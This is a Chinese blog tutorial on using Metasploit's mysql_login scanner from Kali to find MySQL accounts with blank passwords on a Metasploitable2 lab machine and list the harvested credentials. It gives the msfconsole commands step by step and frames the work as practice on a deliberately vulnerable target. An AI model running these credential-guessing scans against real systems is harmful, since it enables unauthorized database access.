实战篇01 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码
2022/1/23 19:06:21
本文主要是介绍实战篇01 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
系列文章目录
实战篇 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码
文章目录
- 系列文章目录
- 前言
- 一、实验环境
- 二、实验步骤
- 1.kali 启动数据库进入 msf 搜索模块
- 2.加载模块,配置并设置参数
- 3.配置完成后执行 run 或者 exploit
- 4.使用后端凭证命令 creds, 列出数据库中的所有凭证
前言
metasploitable 是用于评估 metasploit 的靶机,是一个 Ubuntu-Linux 虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。与VMWare、VirtualBox和其他常见的虚拟化平台兼容。
Metasploitable 默认 用户名:msfadmin, 密码:msfadmin。登陆之后使用 ip addr 可查看 ip 地址。(查看 IP 的命令很多)
有些新手学了点皮毛耗费大量时间自己去找 IP 做测试,这不仅浪费大量时间,而且很容易被请去小黑屋,有这样一个练手的环境直接去干挺好的,安装靶机也不难,省时省力只是占点内存,网上安装教程也很多。
一、实验环境
一台 Kali - Linux 和 一台 Metasploitable2-Linux 靶机。
我的靶机网络模式设置的是桥接(VMnet0)模式。
二、实验步骤
# 启动数据库: root@kali:~# systemctl start postgresql root@kali:~# systemctl enable postgresql #设置成开机启动数据库,我们要经常用
1. kali 启动数据库进入 msf 搜索模块
msfconsole
search mysql_login
2. 加载模块, 配置并设置参数
use auxiliary/scanner/mysql/mysql_login
set rhosts 目标主机IP
set username root #我们配置要爆破的用户
set blank_passwords true #开启为所有用户尝试空密码
show options
3. 配置完成后执行 run 或者 exploit
4. 使用后端凭证命令 creds,列出数据库中的所有凭据
creds
注:如果creds出现错误,可能是postgresql未开启!
例如:
即无活动数据库,凭证将不会被保存。查看主机信息和凭证信息,数据库未连接
这篇关于实战篇01 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-25如何部署MySQL集群资料:新手入门教程
- 2024-12-24MySQL集群部署资料:新手入门教程
- 2024-12-24MySQL集群资料详解:新手入门教程
- 2024-12-24MySQL集群部署入门教程
- 2024-12-24部署MySQL集群学习:新手入门教程
- 2024-12-24部署MySQL集群入门:一步一步搭建指南
- 2024-12-07MySQL读写分离入门:轻松掌握数据库读写分离技术
- 2024-12-07MySQL读写分离入门教程
- 2024-12-07MySQL分库分表入门详解
- 2024-12-07MySQL分库分表入门指南